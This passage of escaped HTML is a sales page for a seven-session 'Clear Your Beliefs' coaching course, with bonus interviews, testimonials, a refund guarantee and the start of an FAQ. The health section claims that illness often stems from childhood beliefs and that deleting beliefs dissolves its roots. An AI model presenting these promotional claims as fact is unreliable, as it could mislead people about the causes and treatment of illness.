a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: 